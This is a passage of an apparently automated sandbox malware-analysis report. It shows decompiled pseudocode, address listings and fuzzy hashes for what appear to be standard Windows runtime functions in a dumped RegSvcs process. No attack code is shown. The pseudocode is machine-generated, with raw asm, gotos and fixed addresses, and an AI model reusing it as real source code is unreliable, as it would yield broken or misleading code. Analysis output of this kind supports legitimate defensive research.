							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01306D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E013076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01398938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E012FB150();
													}
													_t116 = E01396D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E013075CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x13e8638; // 0x0
																	_t122 = L013038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E013076E2(_t154);
																			goto L41;
																		}
																	} else {
																		E013076E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0132FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L013070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0132FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0132FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0132FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0132FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0132FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x13e7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x13e7b84 = _t75;
						_t73 = E0130EB70(_t134, 0x13e7b60);
						if( *0x13e7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0130FF60( *0x13e7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                          0x0132fab0
                                          0x0132fab2
                                          0x0132fab3
                                          0x0132fab4
                                          0x0132fabc
                                          0x0132fac0
                                          0x0132fb14
                                          0x0132fb17
                                          0x0132fac2
                                          0x0132fac8
                                          0x0132facd
                                          0x0132fad3
                                          0x0132fad3
                                          0x0132fadd
                                          0x0132fb18
                                          0x0132fb1b
                                          0x0132fb1d
                                          0x0132fb1e
                                          0x0132fb1f
                                          0x0132fb20
                                          0x0132fb21
                                          0x0132fb22
                                          0x0132fb23
                                          0x0132fb24
                                          0x0132fb25
                                          0x0132fb26
                                          0x0132fb27
                                          0x0132fb28
                                          0x0132fb29
                                          0x0132fb2a
                                          0x0132fb2b
                                          0x0132fb2c
                                          0x0132fb2d
                                          0x0132fb2e
                                          0x0132fb2f
                                          0x0132fb3a
                                          0x0132fb3b
                                          0x0132fb3e
                                          0x0132fb41
                                          0x0132fb44
                                          0x0132fb47
                                          0x0132fb4a
                                          0x0132fb4d
                                          0x0132fb53
                                          0x0136bdcb
                                          0x0136bdcb
                                          0x0132fb59
                                          0x0132fb5b
                                          0x0132fb5b
                                          0x0132fb5e
                                          0x0136bdd5
                                          0x0136bdd8
                                          0x00000000
                                          0x0136bdda
                                          0x00000000
                                          0x0136bdda
                                          0x0132fb64
                                          0x0132fb64
                                          0x0132fb64
                                          0x0132fb67
                                          0x0132fb6e
                                          0x0132fb70
                                          0x0132fb72
                                          0x00000000
                                          0x0132fb78
                                          0x0132fb7a
                                          0x0132fb7a
                                          0x0132fb7d
                                          0x0132fb80
                                          0x0136bddf
                                          0x0136bde1
                                          0x00000000
                                          0x0136bde3
                                          0x00000000
                                          0x0136bde3
                                          0x0132fb86
                                          0x0132fb86
                                          0x0132fb86
                                          0x0132fb8b
                                          0x0132fb90
                                          0x0132fb92
                                          0x0132fb94
                                          0x0132fb9a
                                          0x0132fb9b
                                          0x0132fba1
                                          0x0136bde8
                                          0x0136bdeb
                                          0x0136bded
                                          0x0136beb5
                                          0x0136beb5
                                          0x0136bebb
                                          0x0136bebd
                                          0x0136bec3
                                          0x0136bed2
                                          0x0136bedd
                                          0x0136bedd
                                          0x0136beed
                                          0x00000000
                                          0x0136bdf3
                                          0x0136bdfe
                                          0x0136be06
                                          0x0136be0b
                                          0x0136be0d
                                          0x0136be0f
                                          0x0136be14
                                          0x0136be19
                                          0x0136be20
                                          0x0136be25
                                          0x0136be27
                                          0x0136be35
                                          0x0136be39
                                          0x0136be46
                                          0x0136be4f
                                          0x0136be54
                                          0x0136be56
                                          0x0136bef8
                                          0x0136bef8
                                          0x00000000
                                          0x0136be5c
                                          0x0136be5c
                                          0x0136be60
                                          0x00000000
                                          0x0136be66
                                          0x0136be66
                                          0x0136be7f
                                          0x0136be84
                                          0x0136be87
                                          0x0136be89
                                          0x0136be8b
                                          0x0136be99
                                          0x0136be9d
                                          0x0136bea0
                                          0x0136beac
                                          0x0136beaf
                                          0x0136beb1
                                          0x0136beb3
                                          0x0136beb3
                                          0x00000000
                                          0x0136bea2
                                          0x0136bea2
                                          0x00000000
                                          0x0136bea2
                                          0x0136be8d
                                          0x0136be8d
                                          0x0136be92
                                          0x00000000
                                          0x0136be92
                                          0x0136be8b
                                          0x0136be60
                                          0x0136be3b
                                          0x0136be3b
                                          0x0136be3e
                                          0x00000000
                                          0x0136be40
                                          0x0136be40
                                          0x0136be44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0136be44
                                          0x0136be3e
                                          0x0136be29
                                          0x0136be29
                                          0x00000000
                                          0x0136be29
                                          0x0136be27
                                          0x00000000
                                          0x0132fba7
                                          0x0132fba7
                                          0x0132fbab
                                          0x0136bf02
                                          0x0132fbb1
                                          0x0132fbb1
                                          0x0132fbb8
                                          0x0132fbbd
                                          0x0132fbbd
                                          0x0132fbbf
                                          0x0132fbbf
                                          0x0132fbc5
                                          0x0132fbcb
                                          0x0132fbf8
                                          0x0132fbf8
                                          0x0132fbfa
                                          0x00000000
                                          0x0132fc00
                                          0x0132fc00
                                          0x0132fc03
                                          0x00000000
                                          0x0132fc09
                                          0x0132fc09
                                          0x0132fc0f
                                          0x0132fc15
                                          0x0132fc23
                                          0x0132fc23
                                          0x0132fc25
                                          0x0132fc27
                                          0x0132fc75
                                          0x0132fc7c
                                          0x0132fc84
                                          0x00000000
                                          0x0132fc29
                                          0x0132fc29
                                          0x0132fc2d
                                          0x0132fc30
                                          0x0136bf0f
                                          0x00000000
                                          0x0132fc36
                                          0x0132fc38
                                          0x0132fc3b
                                          0x0132fc41
                                          0x0136bf17
                                          0x0136bf19
                                          0x0136bf48
                                          0x0136bf4b
                                          0x00000000
                                          0x0136bf1b
                                          0x0136bf22
                                          0x0136bf24
                                          0x0136bf26
                                          0x00000000
                                          0x0136bf2c
                                          0x0136bf37
                                          0x0136bf39
                                          0x0136bf3b
                                          0x00000000
                                          0x0136bf41
                                          0x0136bf41
                                          0x0136bf41
                                          0x0136bf41
                                          0x0136bf45
                                          0x00000000
                                          0x0136bf45
                                          0x0136bf3b
                                          0x0136bf26
                                          0x00000000
                                          0x0132fc47
                                          0x0132fc47
                                          0x0132fc49
                                          0x0132fcb2
                                          0x0132fcb4
                                          0x0132fcb6
                                          0x0132fcdc
                                          0x0132fcdc
                                          0x00000000
                                          0x0132fcb8
                                          0x0132fcc3
                                          0x0132fcc5
                                          0x0132fcc7
                                          0x00000000
                                          0x0132fcc9
                                          0x0132fcc9
                                          0x0132fccd
                                          0x00000000
                                          0x0132fccd
                                          0x0132fcc7
                                          0x00000000
                                          0x0132fc4b
                                          0x0132fc4b
                                          0x0132fc4e
                                          0x0132fc4e
                                          0x0132fc51
                                          0x0132fc51
                                          0x0132fc54
                                          0x0132fc5a
                                          0x0132fc5c
                                          0x0132fc5f
                                          0x0132fc61
                                          0x0132fc63
                                          0x0132fc65
                                          0x0132fc67
                                          0x0132fc6e
                                          0x0132fc72
                                          0x0132fc72
                                          0x0132fc72
                                          0x0132fc72
                                          0x0132fc67
                                          0x0132fc61
                                          0x00000000
                                          0x0132fc5a
                                          0x0132fc49
                                          0x0132fc41
                                          0x0132fc30
                                          0x0132fc27
                                          0x0132fc03
                                          0x0132fbcd
                                          0x0132fbd3
                                          0x0132fbd9
                                          0x0132fbdc
                                          0x0132fbde
                                          0x0132fc99
                                          0x0132fc9b
                                          0x0132fc9d
                                          0x0132fcd5
                                          0x0132fcd5
                                          0x0132fc89
                                          0x0132fc89
                                          0x00000000
                                          0x0132fc9f
                                          0x0132fc9f
                                          0x0132fca3
                                          0x00000000
                                          0x0132fca3
                                          0x00000000
                                          0x0132fbe4
                                          0x0132fbe4
                                          0x0132fbe4
                                          0x0132fbe4
                                          0x0132fbe9
                                          0x0132fbf2
                                          0x00000000
                                          0x0132fbf2
                                          0x0132fbde
                                          0x0132fbcb
                                          0x0132fbab
                                          0x0132fc8b
                                          0x0132fc8b
                                          0x0132fc8c
                                          0x0132fb80
                                          0x0132fb72
                                          0x0132fb5e
                                          0x0132fc8d
                                          0x0132fc91
                                          0x0132fadf
                                          0x0132fadf
                                          0x0132fae1
                                          0x0132fae4
                                          0x0132fae7
                                          0x0132faec
                                          0x0132faf8
                                          0x0132fb00
                                          0x0132fb07
                                          0x0132fb0f
                                          0x0132fb0f
                                          0x0132fb07
                                          0x00000000
                                          0x0132faf8
                                          0x0132fadd

                                          Strings
                                          • H", xrefs: 0132FAF1
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0136BE0F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$H"
                                          • API String ID: 0-3659178260
                                          • Opcode ID: 3060b010a75b01e33b57f191409aa64ea047561720eca38ad510df26a8866a71
                                          • Instruction ID: ac13d5d23e32a23f7a0f6cd95745b09a1c3a00f5e88586ef4ae1a0d586527050
                                          • Opcode Fuzzy Hash: 3060b010a75b01e33b57f191409aa64ea047561720eca38ad510df26a8866a71
                                          • Instruction Fuzzy Hash: A7A10571B006268BEB26EF6CC850B7AB7BCAF44718F044569EA46DB795DB30D841CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013BE539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E013BE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E013BBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E013BBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E013BAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01339730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E013BA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E013BA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01339730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E013BA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E013BA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01312280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0130B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0130FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01317D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E013AFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                          0x013be547
                                          0x013be549
                                          0x013be54f
                                          0x013be553
                                          0x013be557
                                          0x013be55a
                                          0x013be55c
                                          0x013be55f
                                          0x013be561
                                          0x013be567
                                          0x013be56b
                                          0x013be7e2
                                          0x00000000
                                          0x013be571
                                          0x013be575
                                          0x013be577
                                          0x013be57b
                                          0x013be57c
                                          0x013be57d
                                          0x013be57e
                                          0x013be57f
                                          0x013be588
                                          0x013be58f
                                          0x013be591
                                          0x013be592
                                          0x013be592
                                          0x013be596
                                          0x013be59e
                                          0x013be5a0
                                          0x013be5a6
                                          0x013be61d
                                          0x013be61d
                                          0x013be621
                                          0x013be623
                                          0x013be630
                                          0x013be630
                                          0x013be7e6
                                          0x013be7eb
                                          0x013be7ed
                                          0x013be7f4
                                          0x013be7fa
                                          0x013be7ff
                                          0x013be7ff
                                          0x013be80a
                                          0x013be812
                                          0x013be812
                                          0x013be5ab
                                          0x013be5b4
                                          0x013be5b9
                                          0x013be5be
                                          0x013be5c0
                                          0x013be5c2
                                          0x013be5c8
                                          0x013be5c9
                                          0x013be5cb
                                          0x013be5cc
                                          0x013be5d5
                                          0x013be5e4
                                          0x013be5f1
                                          0x013be5f8
                                          0x013be5f8
                                          0x013be5d5
                                          0x013be602
                                          0x013be616
                                          0x013be63d
                                          0x013be644
                                          0x013be64d
                                          0x013be652
                                          0x013be657
                                          0x013be659
                                          0x013be65b
                                          0x013be661
                                          0x013be662
                                          0x013be664
                                          0x013be665
                                          0x013be66e
                                          0x013be67d
                                          0x013be68a
                                          0x013be691
                                          0x013be691
                                          0x013be66e
                                          0x013be6b0
                                          0x00000000
                                          0x013be6b6
                                          0x013be6bd
                                          0x013be6c7
                                          0x013be6d7
                                          0x013be6d9
                                          0x013be6db
                                          0x013be6de
                                          0x013be6e3
                                          0x013be6f3
                                          0x013be6fc
                                          0x013be700
                                          0x013be700
                                          0x013be704
                                          0x013be70a
                                          0x013be70a
                                          0x013be713
                                          0x013be716
                                          0x013be719
                                          0x013be720
                                          0x013be761
                                          0x013be76b
                                          0x013be774
                                          0x013be77a
                                          0x013be77a
                                          0x013be78a
                                          0x013be791
                                          0x013be799
                                          0x013be79b
                                          0x013be79f
                                          0x013be7aa
                                          0x013be7c0
                                          0x013be7ac
                                          0x013be7b2
                                          0x013be7b9
                                          0x013be7b9
                                          0x013be7c7
                                          0x013be806
                                          0x00000000
                                          0x013be7c9
                                          0x013be7d1
                                          0x013be7d8
                                          0x00000000
                                          0x013be7d8
                                          0x00000000
                                          0x00000000
                                          0x013be722
                                          0x013be72e
                                          0x013be748
                                          0x013be74c
                                          0x013be754
                                          0x013be756
                                          0x013be75c
                                          0x013be75c
                                          0x00000000
                                          0x013be75c
                                          0x013be758
                                          0x013be758
                                          0x00000000
                                          0x013be758
                                          0x013be750
                                          0x00000000
                                          0x00000000
                                          0x013be752
                                          0x00000000
                                          0x013be752
                                          0x013be730
                                          0x013be735
                                          0x013be73d
                                          0x013be73f
                                          0x00000000
                                          0x00000000
                                          0x013be741
                                          0x013be741
                                          0x00000000
                                          0x013be741
                                          0x013be739
                                          0x00000000
                                          0x00000000
                                          0x013be73b
                                          0x00000000
                                          0x013be73b
                                          0x013be722
                                          0x013be720
                                          0x013be6b0
                                          0x013be618
                                          0x00000000
                                          0x013be618

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction ID: f44dc8cb048768dbe9a7482d2bccf0ac8da496e84d145efc77e5fcbb60d90c53
                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction Fuzzy Hash: E39180312047469FE724CE2DC881B9BBBE5AF84728F14892DF795CBA80E774E904CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013751BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E013751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x13d05f0);
				E0134D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0130EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E013753CA(0);
						return E0134D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0133F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01313690(1, _t117, 0x12d1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0133AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01314620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0133AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
